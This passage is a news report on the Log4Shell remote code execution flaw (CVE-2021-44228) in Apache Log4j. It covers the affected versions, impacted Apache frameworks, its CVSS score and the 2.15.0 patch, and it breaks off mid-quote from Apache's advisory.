Apache has released Log4j version 2.15.0 to address the critical RCE vulnerability and users are urged to apply the update immediately.
The Apache Foundation’s Log4j is a widely used open-source tool by enterprise apps and cloud services. The bad news is that a security vulnerability has been identified in this tool, reported by Alibaba Cloud Security Team’s Chen Zhaojun on November 24. The vulnerability is dubbed Log4Shell or LogJam by Lunasec and tracked as CVE-2021-44228.
About the vulnerability
Log4Shell is an unauthenticated RCE vulnerability that allows an attacker to gain full system takeover on devices running Log4j 2.0-beta9 up to 2.14.1. The vulnerability impacts the default configuration of numerous Apache frameworks, including Apache Druid, Apache Solr, Apache Struts2, Apache Flink, etc.
The vulnerability, according to researchers, threatens anyone using the open-source Apache Struts framework and can also cause a Mini Internet Meltdown Soonish, according to British security expert Kevin Beaumont.
The bug was given a 10/10 score in the CVSS rating system, which indicates the issue’s severity. In its security advisory, the Apache Foundation stated that an attacker who can control log message parameters or log messages can efficiently execute arbitrary code loaded from “LDAP servers when message lookup substitution